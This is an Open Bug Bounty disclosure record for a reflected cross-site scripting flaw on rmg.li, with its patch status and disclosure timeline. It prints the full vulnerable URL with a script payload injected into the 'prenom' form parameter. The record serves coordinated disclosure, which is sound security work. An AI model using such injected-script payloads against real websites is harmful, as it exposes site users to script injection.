rmg.li XSS vulnerability

2017-07-10T15:41:00
ID OBB:262635
Type openbugbounty
Reporter Tomy2e
Modified 2017-07-29T19:36:00

Description

Vulnerable URL:
https://rmg.li/form.php?idClient=4665&idC;=8759&erreur;=0&prenom;=%22/%3E%3Cscript%3Ealert(%27OPENBUGBOUNTY%27)%3C/script%3E&nom;=t&email;=tt@tt.com&datenaissance;=&adresse;=&ville;=&cp;=&pays;=&supp1;=&supp2;=&supp3;=
Details:

Description| Value
---|---
Patched:| Yes, at 29.07.2017
Latest check for patch:| 29.07.2017 19:36 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2632946
VIP website status:| No
Check rmg.li SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 10 July, 2017 15:41 GMT
Generic security notifications sent to website owner| 10 July, 2017 15:43 GMT
Vulnerability details disclosed by researcher| 17 July, 2017 16:15 GMT
Vulnerability patched by the website owner| 29 July, 2017 19:36 GMT